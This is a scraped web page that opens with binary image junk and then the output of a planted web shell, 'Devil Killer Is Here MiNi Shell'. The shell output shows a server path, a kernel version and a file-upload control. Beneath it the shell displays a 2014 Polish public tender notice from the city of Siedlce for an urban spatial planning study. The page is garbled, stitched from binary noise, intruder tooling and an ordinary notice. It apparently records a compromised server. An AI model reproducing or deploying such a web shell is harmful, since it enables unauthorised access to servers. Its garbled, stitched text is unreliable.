JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140217/55424-N-2014.html

<p class="kh_header"><b>Siedlce: Sporządzenie studium uwarunkowań i kierunków zagospodarowania miasta Siedlce</b><br>
<b>Numer ogłoszenia: 55424 - 2014; data zamieszczenia: 17.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Siedlce , Skwer Niepodległości 2, 08-110 Siedlce, woj. mazowieckie, tel. 25 794 37 86, faks 25 794 37 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siedlce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie studium uwarunkowań i kierunków zagospodarowania miasta Siedlce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES ZAMÓWIENIA:
I.SZCZEGÓŁOWY  OPIS  ZADANIA:
Przedmiotem zamówienia jest sporządzenie studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce w granicach  administracyjnych  o powierzchni opracowania około 3186 ha wraz z aktualizacją opracowania ekofizjograficznego oraz prognozą oddziaływania na środowisko. 
Przedmiot zamówienia należy opracować zgodnie z obowiązującymi przepisami prawa, 
a w szczególności z: ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym  (Dz. U. z 2012 r. poz. 647, z póź. zm.), ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z póź. zm.), ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. Nr 25, poz. 150 z 2008 r. z póź. zm.), rozporządzeniem Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. Nr 118, poz. 1233), rozporządzeniem Ministra Środowiska z dnia 09 września 2002 r. w sprawie opracowań ekofizjograficznych (Dz. U. z 2002 r. Nr 155, poz. 1298), innymi obowiązującymi przepisami prawa, dotyczącymi przedmiotu zamówienia. 
Podstawą opracowania jest uchwała Rady Miasta Siedlce Nr XXX/567/2013 z dn. 26 kwietnia 2013 r. w sprawie przystąpienia  do sporządzenia studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce.
Założeniami do opracowania  studium jest określenie nowych zasad kształtowania polityki przestrzennej miasta, w tym lokalnych zasad zagospodarowania przestrzennego oraz wzajemnych relacji i oddziaływań między nimi. Aktualizacji  wymaga uwzględnienie zmian niektórych uwarunkowań faktycznych i prawnych mających istotne znaczenie dla przestrzeni miasta, w tym Koncepcji Zagospodarowania Przestrzennego Kraju 2030, ustaleń nowych opracowań:  strategii rozwoju i planu zagospodarowania przestrzennego województwa  mazowieckiego, znajdujących się obecnie  w fazie końcowej sporządzania. 
II. REALIZACJA   ZADANIA  BĘDZIE  SKŁADAĆ  SIĘ  Z NIŻEJ  WYMIENIONYCH  CZĘŚCI: 
1)Część I - analiza danych wejściowych: 
a)analiza stanu istniejącego zagospodarowania przestrzennego miasta w odniesieniu do obowiązującego studium i aktualnie obowiązujących aktów prawnych, analiza wniosków w sprawie  zmian ustaleń studium i planów miejscowych wraz z propozycją ich uwzględnienia,  analiza wydanych decyzji administracyjnych dotyczących zmian w zagospodarowaniu przestrzennym, analiza Strategii rozwoju Siedlec, analiza w odniesieniu do Siedlec: Strategii Województwa Mazowieckiego, planu zagospodarowania przestrzennego Województwa Mazowieckiego oraz Koncepcji Zagospodarowania Przestrzennego Kraju 2030, przedstawiona 
w 1 egz. w analogowej formie opisowej i graficznej oraz w 1 egz.  w formie publikacji elektronicznej na płycie CD,  
b)sporządzenie analizy i oceny zmian w zagospodarowaniu przestrzennym miasta, w tym zmian uwarunkowań faktycznych,  z uwzględnieniem zagadnień, o których mowa w art. 32 ust. 1 i ust. 3 ustawy o planowaniu i zagospodarowaniu przestrzennym oraz wykorzystaniem analiz określonych w pkt 1 lit. a), umożliwiającej dokonanie przez Radę Miasta oceny aktualności studium i planów miejscowych, przedstawionej w 2 egz. w formie analogowej jako opracowanie tekstowe i graficzne i w 1 egz. w formie zapisu elektronicznego na płycie CD,
c)sporządzenie podstawowego opracowania ekofizjograficznego dla obszaru miasta Siedlce, stanowiącego aktualizację merytoryczną obecnego opracowania i spełniającego warunki odpowiadające potrzebom studium, w 2 egz.  w formie analogowej oraz w 1 egz. w formie publikacji elektronicznej na płycie CD,
d)opracowanie koncepcji projektu studium z rysunkiem projektu studium w skali 1:10000, uwzględniającej wyniki z dokonanych analiz, w 1 egz. w formie analogowej oraz w 1 egz. w formie publikacji elektronicznej na płycie CD,  
e)opracowanie  uzasadnień nieuwzględnienia  wniosków w projekcie studium w 1 egz.  oraz w 1 egz. w formie publikacji elektronicznej na płycie CD,  
f)przekazanie materiałów planistycznych, określonych w pkt 1 lit. a), b), c), d), e) Zamawiającemu i przedstawienie przez zespół autorski koncepcji studium na Kolegium Prezydenta Miasta,
g)przedstawienie wyników analiz i ocen, określonych w pkt 1 lit. b) na posiedzeniu komisji urbanistyczno-architektonicznej.
2)Część II - projektowanie: 
a)opracowanie projektu studium zgodnie z wymaganym przepisami zakresem  części tekstowej i graficznej dokumentu.  Projekt studium winien być opracowany  w formie składającej się z następujących części:
tekstowej określającej uwarunkowania oraz zawierającej ustalenia kierunków zagospodarowania przestrzennego miasta, o których mowa w art. 10  ustawy o planowaniu i zagospodarowaniu przestrzennym,graficznej projektu studium przedstawiającej w/w uwarunkowania na mapie, zwaną dalej częścią graficzną uwarunkowań,  w skali 1:10000, rysunku przedstawiającego w formie graficznej ustalenia, określające kierunki zagospodarowania przestrzennego miasta, a także granice obszarów, o których mowa w art. 10 ust. 2 w/w ustawy, zwaną  dalej rysunkiem kierunków,  przedstawionego na   mapie  w skali 1:10000,uzasadnienia zawierającego objaśnienia przyjętych rozwiązań oraz syntezę ustaleń studium, 
w  1 egz. w formie analogowej oraz w 1 egz. w następującej formie publikacji elektronicznej na płycie CD:przygotowanie części graficznej uwarunkowań i rysunku kierunków projektu studium w zapisie numerycznym w co najmniej wersji 10,0 oprogramowania  EWMAPA firmy GEOBID z Katowic,przygotowanie projektu studium w formie plików pdf, zapis tekstu studium w formie dokumentu  co najmniej WORD  2000, w formacie doc/docx,
b) przekazanie materiałów określonych  w pkt. 2 lit. a) Zamawiającemu i przedstawienie przez zespół autorski projektu studium na Kolegium Prezydenta Miasta.
3)część III - komisja urbanistyczno- architektoniczna:
a)opracowanie prognozy oddziaływania na środowisko studium uwzględniającej wymagania zawarte w przepisach ustawy z dnia 03 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko  ,
b)przedstawienie projektu studium na posiedzeniu komisji urbanistyczno- architektonicznej,
c)analiza uwag komisji i propozycje ich uwzględnienia,
d)wprowadzenie do projektu studium, uwzględnionych przez Zamawiającego, korekt wynikających z uzyskanej opinii komisji,
e)opracowanie uzasadnień nieuwzględnienia, w projekcie studium, uwag komisji urbanistyczno-architektonicznej,
f)przekazanie materiałów, określonych w pkt 3 lit.  a)  w 2 egz. w formie analogowej oraz w 1 egz.  w formie publikacji elektronicznej na płycie CD oraz określonych w pkt 3 lit. c), d)  i e) w 1 egz.  w formie analogowej oraz w 1 egz. w formie publikacji elektronicznej na płycie CD, Zamawiającemu.
4)część IV - uzgadnianie i opiniowanie:
a)uczestniczenie w opiniowaniu i uzgadnianiu projektu studium z właściwymi organami wymaganymi na podstawie ustawy o planowaniu i zagospodarowaniu przestrzennym 
i przepisów  odrębnych,
b)wprowadzenie do projektu studium korekt wynikających z uzyskanych opinii i dokonanych uzgodnień, w tym wynikających z ponawiania czynności,
c)opracowanie uzasadnień nieuwzględnienia, w projekcie studium, uwag organów  opiniujących i uzgadniających, w tym otrzymanych w wyniku  ponawiania czynności, w 1 egz. oraz 1 egz. w formie publikacji elektronicznej na płycie CD, 
d)przekazanie uzgodnionego projektu studium  w 1 egz. w formie analogowej, w tym części graficznej uwarunkowań i rysunku kierunków,  przedstawionych na mapach w skali 1:5000, oraz w 1 egz. w formie publikacji elektronicznej na płycie CD, wraz z uzasadnieniem, o którym mowa w pkt 4 lit. c),  Zamawiającemu.
5)część V - wyłożenie i dyskusja publiczna:
a)uczestniczenie w dyżurze autorskim i dyskusji publicznej w czasie wyłożenia projektu studium do publicznego wglądu wraz z prognozą oddziaływania  na  środowisko, 
b)opracowanie analizy uwag wniesionych do projektu studium i dokumentu prognozy wraz z przedstawieniem graficznym ich rozmieszczenia w terenie oraz  propozycją uwzględnienia oraz uzasadnieniem nieuwzględnienia pozostałych  i przekazanie jej Zamawiającemu, w 1 egz.  oraz w 1 egz. w formie publikacji elektronicznej na płycie CD i uzyskanie akceptacji  Zamawiającego,
c)wprowadzenie do projektu studium i dokumentu prognozy zmian wynikających z rozpatrzenia uwag,  
d)uczestniczenie w ewentualnym ponowieniu uzgodnień i opinii w niezbędnym zakresie,
e)wprowadzenie do projektu studium i dokumentu prognozy  korekt wynikających z ponownych uzgodnień i opinii,
f) przekazanie Zamawiającemu skorygowanego dokumentu prognozy w 1 egz. w formie analogowej i w 1 egz.  w formie publikacji elektronicznej na płycie CD oraz skorygowanego projektu studium w 1 egz. w formie analogowej, w tym części graficznej uwarunkowań i rysunku kierunków,  przedstawionych na mapach w skali 1:5000, oraz w 1 egz. w formie publikacji elektronicznej na płycie CD,
6)część VI - uchwalenie:
a)przedstawienie projektu studium na posiedzeniu Komisji Gospodarki Przestrzennej i Ochrony Środowiska oraz na Sesji Rady Miasta do uchwalenia wraz z listą nieuwzględnionych uwag,
b)przygotowanie uzasadnienia oraz podsumowania w zakresie wynikającym z art. 42 pkt. 2 oraz art. 55 ust. 3 ustawy z dnia 03 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko,  w 1 egz. oraz 1 egz. w formie publikacji elektronicznej na płycie CD, 
c)przekazanie Studium, stanowiącego załączniki do uchwały o uchwaleniu, w tym części graficznej uwarunkowań i rysunku kierunków przedstawionych na mapach w skali 1:5000,  łącznie z rozstrzygnięciem o sposobie rozpatrzenia uwag Zamawiającemu w 4 egz. w formie analogowej, w tym co najmniej 2 egz. rysunku kierunków oprawione w listwy, zafoliowane lub zalaminowane i wykonane przy użyciu materiałów zapewniających wysoką światłoodporność oraz udostępnienie w 1 egz. w formie publikacji elektronicznej na płycie CD części tekstowej 
w formacie doc/docx i pdf oraz części graficznych w formacie pdf , w tym rysunków studium w skali 1: 5 000 i 1:10 000, 
d)udzielanie ewentualnych wyjaśnień Wojewodzie, któremu została przedstawiona uchwała o uchwaleniu studium wraz z załącznikami, do ich oceny pod względem zgodności  z przepisami prawa,
e)udostępnienie wersji numerycznej uchwalonego dokumentu (części graficznej uwarunkowań i rysunku kierunków) w co najmniej wersji 10,0 oprogramowania EWMAPA firmy GEOBID z Katowic, 
f)udział w czynnościach niezbędnych do ewentualnego doprowadzenia studium do zgodności z przepisami prawa, w tym udział w postępowaniu przed sądami administracyjnymi. 
Zamawiający przewiduje udzielenie zamówienia  uzupełniającego w stosunku do zamówienia podstawowego, o którym mowa w art. 67 ust. 1 pkt. 6 ustawy - Prawo zamówień publicznych. Realizacja zamówienia  uzupełniającego odbywać się będzie w zakresie przewidzianym przedmiotem zamówienia obejmującym Część  V lub/i część  VI realizacji zadania.
Przy realizacji zamówienia na sporządzenie studium uwarunkowań i kierunków zagospodarowania miasta Siedlce konieczne jest zastosowania co  najmniej wersji 
10,0 oprogramowania EWMAPA firmy  Geobid z Katowic  oraz edytora tekstu co najmniej Word 2000. Teksty w formacie doc/docx i pdf. Rysunki również  w formie plików pdf.     
Przedmiot zamówienia obligatoryjnie jest opracowaniem zawierającym część tekstową  oraz część graficzną, w tym część w formie wielkoskalowego rysunku sporządzanego na odpowiedniej kopii  mapy. Miasto Siedlce posiada w państwowym zasobie geodezyjnym i kartograficznym numeryczną, wielkoskalową mapę wektorową, założoną i prowadzoną w programie EWMAPA od 19.10.1999 r. Program ten współdziała z częścią opisową ewidencji gruntów (EWOPIS), z częścią opisową ewidencji sieci uzbrojenia terenu (SESUTEM),  z częścią opisową planów zagospodarowania przestrzennego (WINPLAN).  Dane EWMAPY  mogą być wyeksportowane w formatach DXF, SHP oraz  wprowadzone do systemów CAD-owskich i GIS-owskich. Wykonywanie  przedmiotu zamówienia będzie stanowiło również  aktualizację  obowiązującego  od 24.10.2005 r. dokumentu Studium uikzp miasta Siedlce z częściami graficznymi  sporządzonymi  w oprogramowaniu EWMAPA. 
W celu umożliwienia kontynuacji i bieżącego korzystania z posiadanych zasobów informatycznych a także zapewnienia kompatybilności technicznej w ich użytkowaniu i dozorze wymagane jest zastosowanie podanych narzędzi   informatycznych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia  uzupełniającego w stosunku do zamówienia podstawowego, o którym mowa w art. 67 ust.1 pkt. 6 Ustawy. Realizacja zamówienia  uzupełniającego odbywać się będzie w zakresie przewidzianym przedmiotem zamówienia obejmującym Część  V i/lub część  VI realizacji zadania. Zamówienie  uzupełniające wyniesie nie więcej niż 20% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej:
a)jedno opracowanie studium lub zmiany studium terenu miasta, gminy miejskiej lub gminy miejsko-wiejskiej o liczebności min. 50 tys. mieszkańców o obszarze opracowania min. 1000 ha, przy czym obszar opracowania zmiany studium nie może dotyczyć zasięgu terytorialnego wykonania formy ujednoliconej opracowania, lecz powinien obejmować powierzchnię w granicach obszaru objętego zakresem zmian zgodnie z uchwałą o przystąpieniu do sporządzania zmiany studium,
b)jedno opracowanie miejscowego planu zagospodarowania przestrzennego lub zmiany planu terenu miasta o liczebności min. 50 tys. mieszkańców,
c)jedno opracowanie (studium lub zmiany studium, miejscowy plan lub zmiana planu) wykonane w programie  EWMAPA firmy GEOBID z Katowic.
Liczebność mieszkańców wskazanych jednostek administracyjnych powinna być ustalona na dzień 30.06.2013 r. według danych GUS Ludność. Stan i struktura w przekroju terytorialnym.
Opracowania  winny być wykonane na podstawie ustawy z dnia 27 marca 2003 r.  o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2012 r.  poz. 647,  z póź. zm.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że będzie dysponował:
a)	narzędziami, wyposażeniem zakładu i urządzeniami technicznymi dostępnymi wykonawcy usług w celu wykonania zamówienia tj.: wersją oprogramowania co najmniej  10,0  EWMAPA firmy GEOBID z Katowic, co najmniej  WORD  2000.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług  posiadającymi kwalifikacje zawodowe, doświadczenie  i wykształcenie niezbędne dla wykonania zamówienia, tj.:osobą pełniącą funkcję głównego projektanta, który jest wpisany na listę członków właściwej izby urbanistów, posiadającą doświadczenie w wykonaniu bądź wykonywaniu prac nad opracowaniem studium lub zmianą studium terenu miasta o liczebności minimum 50 tys. mieszkańców (ustalonej na dzień 30.06.2013 r. według danych GUS: Ludność. Stan i struktura w przekroju terytorialnym), jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej,	jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej, jedną osobą posiadającą doświadczenie w pracy z oprogramowaniem EWMAPA, która wykonała jedno opracowanie w tym programie (studium lub zmiana studium, plan miejscowy lub zmiana planu miejscowego).
Uwaga: Zamawiający dopuszcza połączenie wyżej wskazanych funkcji, pod warunkiem spełniania przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.
Określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza się odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom Państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej,  z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 07 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623, z póź. zm.) oraz ustawy z dnia 18 marca 2008 r.  o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz.394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający żąda wskazania przez Wykonawcę w wykazie usług jednego opracowania Studium lub zmiany Studium terenu miasta, gminy miejskiej lub gminy miejsko-wiejskiej o liczebności min. 50 tys. mieszkańców o obszarze opracowania min. 1000 ha (przy czym obszar opracowania zmiany studium nie może dotyczyć zasięgu terytorialnego wykonania formy ujednoliconej opracowania, lecz powinien obejmować powierzchnię w granicach obszaru objętego zakresem zmian zgodnie z uchwałą o przystąpieniu do sporządzania zmiany studium), jednego opracowania miejscowego planu zagospodarowania przestrzennego lub zmiany planu terenu miasta o liczebności min. 50 tys. mieszkańców, jednego opracowania (studium lub zmiany studium, miejscowego planu lub zmiany miejscowego planu) wykonanego w programie EWMAPA firmy GEOBID z Katowic. 
Liczebność mieszkańców wskazanych jednostek administracyjnych powinna być ustalona na dzień 30.06.2013 r. według danych GUS Ludność. Stan i struktura w przekroju terytorialnym.
Opracowania winny być wykonane na podstawie ustawy z dnia 27 marca 2003 r.  o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2012 r.  poz. 647,  z póź. zm.). 
Zamawiający nie wymaga przedstawienia informacji o robotach niewykonanych lub wykonanych nienależycie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

